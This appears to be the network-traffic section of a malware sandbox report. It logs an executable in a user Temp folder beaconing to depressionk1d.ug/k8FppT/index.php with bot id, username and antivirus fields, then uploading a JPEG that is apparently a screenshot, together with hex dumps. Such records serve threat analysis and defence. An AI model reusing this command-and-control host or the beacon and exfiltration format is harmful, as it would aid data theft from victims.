                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:09.348782063 CET1403OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:09.348834038 CET1409OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:09.348854065 CET1413OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:09.348941088 CET1418OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:09.371639967 CET1434OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:09.371745110 CET1450OUTData Raw: 37 92 6e 14 6d 93 19 da ca c1 86 47 a6 54 57 95 86 9a 85 68 4a 5b 26 bf 33 aa ac 5b 83 4b b1 f2 86 68 07 34 bb 29 42 1a fb ab 1e 06 82 52 d1 b4 d2 ec 34 f5 10 94 52 ec 34 bb 0d 3b 05 cf b4 09 ac a7 3f e9 32 ff 00 be 7f 9d 69 93 59 2e 7f d2 65 ff
                          Data Ascii: 7nmGTWhJ[&3[Kh4)BR4R4;?2iY.e|:JC`1O:_UG_8P<otRc"z20S{Wzy(h/q3Gk*e(M8BM\MKqkGpEboAm=x:4wk,
                          Nov 12, 2021 22:23:09.371803045 CET1460OUTData Raw: e4 8a a9 e3 7e 2f ad 3f eb d9 7f ad 5b 8f ef 0f ad 56 f1 d2 e2 fe d3 fe bd 97 f9 d7 26 2b 74 75 e0 be 23 ca 3b 56 a5 d7 89 35 9b cd 3b ec 12 dd 42 20 f2 63 b7 2d 1d ac 51 c8 f1 20 01 51 a4 55 0e ca 30 38 62 47 03 d2 b2 b3 4a 0d 7c d3 49 ee 7d 8a
                          Data Ascii: ~/?[V&+tu#;V5;B c-Q QU08bGJ|I}n:NPj:%u Ex9veuk6m1U*Jg.#-?-"h#yVR'`9>:u|Of2wBy{5HRq{[3FW[rmh9"


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          70192.168.2.449854178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:35.977914095 CET5024OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:36.003946066 CET5025INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:35 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:36.076555967 CET5025OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:36.076731920 CET5025OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:36.076972008 CET5035OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:36.077384949 CET5038OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:36.099487066 CET5043OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:36.099528074 CET5049OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:36.099685907 CET5054OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:36.099714041 CET5059OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:36.099735975 CET5065OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:36.122046947 CET5070OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:36.122087002 CET5081OUTData Raw: f2 17 b7 ff 00 7a 9f aa 1f f8 9a 5c 7f be 6a 3d 1b fe 42 f6 ff 00 ef 53 b5 13 9d 46 7f f7 cd 72 5b f7 ff 00 23 59 7f 07 e6 56 a4 ef 45 15 b9 ca 2d 14 94 b4 00 52 d2 52 f6 a0 40 29 69 29 69 08 29 45 25 28 a0 41 40 a2 81 48 07 03 4a 29 29 45 21 31
                          Data Ascii: z\j=BSFr[#YVE-RR@)i)i)E%(A@HJ))E!1)"Wm$*PvxEz^^<CW6_9z1z=x'KtVNkQ<i/Vk~B4WIqNQZVCZxsPNE&LsR@)i)"5Tp5
                          Nov 12, 2021 22:23:36.169392109 CET5133INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          71192.168.2.449855178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:36.150866032 CET5132OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:36.176911116 CET5133INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          72192.168.2.449856178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:36.307986975 CET5134OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:36.333367109 CET5134INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          73192.168.2.449857178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:36.480122089 CET5135OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:36.505465984 CET5135INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:36 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          74192.168.2.449858178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:36.576028109 CET5136OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:36.576247931 CET5136OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:36.576577902 CET5146OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:36.576750994 CET5149OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:36.598956108 CET5155OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:36.599087954 CET5169OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:36.599155903 CET5174OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:36.621447086 CET5183OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:36.621562958 CET5194OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
